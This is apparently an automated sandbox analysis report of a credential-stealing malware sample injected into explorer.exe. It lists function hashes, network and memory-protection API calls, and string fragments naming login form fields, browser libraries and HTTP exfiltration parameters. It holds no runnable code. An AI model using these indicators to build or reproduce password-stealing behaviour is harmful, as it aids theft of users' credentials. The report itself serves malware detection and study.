                                                          • Opcode ID: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                          • Instruction ID: 3d43a2f6ea6018f1afb385d088e53a94cb5cac2d82127c623aa425ffa42fbaf5
                                                          • Opcode Fuzzy Hash: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                          • Instruction Fuzzy Hash: CF315472A003199FDB60DF2DCC40BEEB7F8EB54610F554596ED89E3244EF309A548BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 53ef1f499b01e650ac53c88b03bc11584654f9fd4b51c3e6b15c5eabdcb7b429
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: D091B371E0021A9BEB64DF6DC880ABEBBFDEF44728F14855AE9D5E72C0D73489408751
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                          • Instruction ID: 7ee7dffd314e27f1a24b1d81502e5448390e77526cbdeceb467e7901815968c5
                                                          • Opcode Fuzzy Hash: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                          • Instruction Fuzzy Hash: F3812971D002799BDB35DB54CC44BEEBAB8AF49754F0041EAEA59B7240D7709E84CFA0

                                                          Execution Graph

                                                          Execution Coverage:2.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:16

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869ef82-869f920; internal calls to 869b5b2, 869b552, 869b732, 869b6b2, 869b382, 869b7b2, 869e942, 869fd62, 869fd92, 869c482, 869c042, 869be72, 86a0002 and 86a0262; API calls getaddrinfo, setsockopt and recv.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: getaddrinforecvsetsockopt
                                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                          • API String ID: 1564272048-1117930895
                                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction ID: 75da473bbc136d20dcd9351f8dc7f04b281aa10a0101d8ea7d12964ff9f2fd36
                                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction Fuzzy Hash: 9F52B434614B088FCB69EF68D4847E9B7E5FB54301F52452EC49FCB282DE30A54ACB85

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869e232-869e8cd; internal calls to 869e942, 869e172 and 869fe92; API call NtCreateFile.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: `
                                                          • API String ID: 823142352-2679148245
                                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction ID: 04841658f33d82449147b628189d5aadb1c974df26d279c0037e2aa24feafeea
                                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction Fuzzy Hash: 18225B70A18B09DFCB59DF68C4956AAF7E5FB58302F41022ED09ED7290DB71E452CB81

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869fe12-869fe8f; internal call to 869e942; API call NtProtectVirtualMemory.
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0869FE67
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction ID: f3315c3b1640e264edcf19a1f613ee43a300d4bb3ca6c89ea72e1840d13cee6e
                                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction Fuzzy Hash: 3401B134668B484F8B88EF6CE48012AB7E4FBCD315F000B3EE99AC3254EB70C5414742

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869fe0a-869fe8f; internal call to 869e942; API call NtProtectVirtualMemory.
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0869FE67
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction ID: 52f1f3cb71a8d622605482237e10a76a2ae4b43bbcc29d2228e4ecd6fd5feed4
                                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction Fuzzy Hash: 7F01A734628B884B8B44EB6C94411A6B3E5FBCE315F000B3EE5DAC3241DB61D5024782

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 086999A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 17131229e0227eb9e50b36660f75703e1757a8999a8af06763cbd6f6a9806ef8
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: CF319F31614A0C8ECF44EFA8C8847EDBBE5FB58216F45422ED45ED7340DE7886458B89

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 086999A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: cc72d18ed8bdb696bd01337d65cc95aa0d5c91c42f351d6ec37ae07d38845d41
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: E4219170614B4C8ECF45EFA8C8847EDBBA5FF58206F45422EE45AD7380DE7486458B8A

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 8695b66-8695cf6; internal calls to 869c612, 869e942, 86a0da4, 86a0022 and 86a03e2; API call CreateMutexW.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction ID: b3bc8922a6e7aea83cf40e959cbce03e928bcc964c9a27b94fef59d76b605736
                                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction Fuzzy Hash: 22417A74918A08CFCF95EFA8C8D87AD77E0FB58301F05426EC84ADB295EA309945CB85

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction ID: 35a69c5f56898889107beb3c9ca9c5fedac320a17e796face0c9b8fbd846ebc5
                                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction Fuzzy Hash: ED412974918A08CFDF94EFA8C498BAD77E4FB68301F05416EC84ADB256DE309945CB85

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869b72e-869b7ab; internal call to 869e942; API call connect.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction ID: b3c59088ae8b100b415ef366c3ac675e85dd7a408d3adeff98605a7c0df00845
                                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction Fuzzy Hash: 0C015E30618B188FCB84EF5CE088B55B7E0FB58325F1545AED94DCB266C674C8818BC2

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869b732-869b7ab; internal call to 869e942; API call connect.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction ID: 160db7243964612df0d6f2f4ed6eb64851df70dd7ef760aa4ede8a766d065c4b
                                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction Fuzzy Hash: 90012170618A1C8FCB84EF5CE088B5577E0FB59315F1541AE994DCB266C674C9818BC2

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869b6b2-869b72d; internal call to 869e942; API call send.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: send
                                                          • API String ID: 2809346765-2809346765
                                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction ID: 512ddad87178f00cea1077902ba49f30076671b76d8d0128113dfcab188a3527
                                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction Fuzzy Hash: 6D011270518A188FDBC4EF5CE088B2577E0EB58315F1646AED85DCB366D670D8818B85

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 869b5b2-869b62b; internal call to 869e942; API call socket.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: sock
                                                          • API String ID: 98920635-2415254727
                                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction ID: 71cae5d1c74909a86df2fd466668fd9cf36a8f4d7975232164fe6b6e012f1b87
                                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction Fuzzy Hash: 2301713061861C8FCB84EF1CE048B50BBE0FB59314F1545AED45ECB366C7B0C9818B86

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 86932dd-869340e; internal calls to 869e942, 869df12, 8693e72, 8694432 and 86930f2; API call SleepEx.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction ID: 345d4f07852bed69867326e0bb582c728860243eec0cd0f7007fd6f8a0f9b9c4
                                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction Fuzzy Hash: DF318874644B89DADF64EF2981882A5B3A4FB44302F46527FC9ADCA386CB309455CFD1

                                                          Control-flow Graph
                                                          • Basic-block edge list omitted (executed / not-executed colouring not recoverable): function at 8693412-869347d; internal calls to 869e942 and 86a0c9e; API call CreateThread.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction ID: 85138430dffd555042c01004626e97cff6eef8d481cfbb89d895fe504e846473
                                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction Fuzzy Hash: E0F0C234268B484FDB88EB2CD44562AB3D4EBA8215F45063EA58EC3364DA79C5814B56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                          • API String ID: 0-393284711
                                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction ID: 0f7e1fff99389f49ca319c6c08cb2be90c8ada8559b26193050f0367bfb8df82
                                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction Fuzzy Hash: B4E16870618F588FC765EF68C4947AAB7E0FB58301F404A2E959BC7245EF30A9418B8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                          • API String ID: 0-2916316912
                                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction ID: 35dcbcaaa18af95af84277b19629074e1e7285c57bc2ffe792ed4928c5c3dbca
                                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction Fuzzy Hash: 67B16C30518B488FDB59EF68C485AEEB7F1FF98300F50492ED49ACB251EF7099458B86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                          • API String ID: 0-1539916866
                                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction ID: 8965020d7752c0dc5dbef5eb43c23405faf66bfe27dcf1d22e63ef25d5639e58
                                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction Fuzzy Hash: C3419070A18B088FDB14DF88A4996AD7BE6FB48700F00025EE809D7245DBB59D458BD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                          • API String ID: 0-355182820
                                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction ID: 24cc54d3aa5f5a0f54fecb37b9a427f86158a9f727574f43c8ab0664316c51c0
                                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction Fuzzy Hash: 79C15B74218F198FC759EF28C495AAAF3E5FB94304F404A2E949AC7250DF30EA55CB87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                          • API String ID: 0-97273177
                                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction ID: fc08ce7491041c52a0916f65f3a7009aff13fe42f15fd1499658bc24bc24aef0
                                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction Fuzzy Hash: F651D4315187488FD719DF18D8816AAB7E5FB85700F501A3EE8CBC7246DBB4A946CB83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction ID: 2823aa7d2b31dbf1754ea4081ae239bd900cb349834087b4572e0c105dcb9274
                                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction Fuzzy Hash: F2C1A070628A198FCB58EF68D495AAAB3E5FF98300F44476D940ED7250DF30AA41CBC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction ID: 5f1c94f882815b488b1776455a70cff5ac23e3a8db77502625db934a0b83f2b9
                                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction Fuzzy Hash: 37C1A170628A198FCB58EF68D495AAAB3E5FF98300F44476D940ED7250DF30AA41CBC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction ID: 16265dd4b8e43bc8cbd50c1645736ca4dd4f9a0eeaf9700d01b8bf0e38afb623
                                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction Fuzzy Hash: E1A191706187588FDB19EFA8D4447EEB7E1FF98300F40462ED48AD7291EF709985878A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction ID: ed06f1ca5f3617dab4e2536ff7a7cb4a5e4b77ba144a0b204a1c6bbdc2940e17
                                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction Fuzzy Hash: 9E9182706187588FDB19EFA8D4447EEB7E1FF98300F40462ED44AD7291EF709985878A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$e$n$v
                                                          • API String ID: 0-1849617553
                                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction ID: f522c088a5b0051e54f19b4bc5c1d36be62698cc34c7b2f2ae9b7b719aaa098c
                                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction Fuzzy Hash: BA717031618A498FD758EFA8C4847AAB7F1FF58304F00063FD44AD7261EB71AD858B86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                                          • API String ID: 0-1970020201
                                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction ID: ebdb8a37c39fd695665603d066956710328f37a4fcb935ed5ac4a2064305b811
                                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction Fuzzy Hash: 4C514FB0918B4C8FDB55EFA8C0456EEB7F1FF58300F404A2E959AE7254EF7095418B8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4$\$dll$ion.$vers
                                                          • API String ID: 0-1610437797
                                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction ID: f95b072eb3b4490bb922f6b9ec2cd3afeb139d03f6c96d3e0176536233a7b126
                                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction Fuzzy Hash: 24416030658B8C8BCB69EF2898557EAB7E4FB98301F41462E985EC7240EF30D9458782
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 32.d$cli.$dll$sspi$user
                                                          • API String ID: 0-327345718
                                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction ID: 6d8f3d094b56a6a5a55f6c497700425db9e0b1a1e277157b9c8c5caf2bcee9d0
                                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction Fuzzy Hash: 67413E30A18E1D8FCB54EFA880957ED77E5FB58300F5445AAAC0ED7250EA71D9818B86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
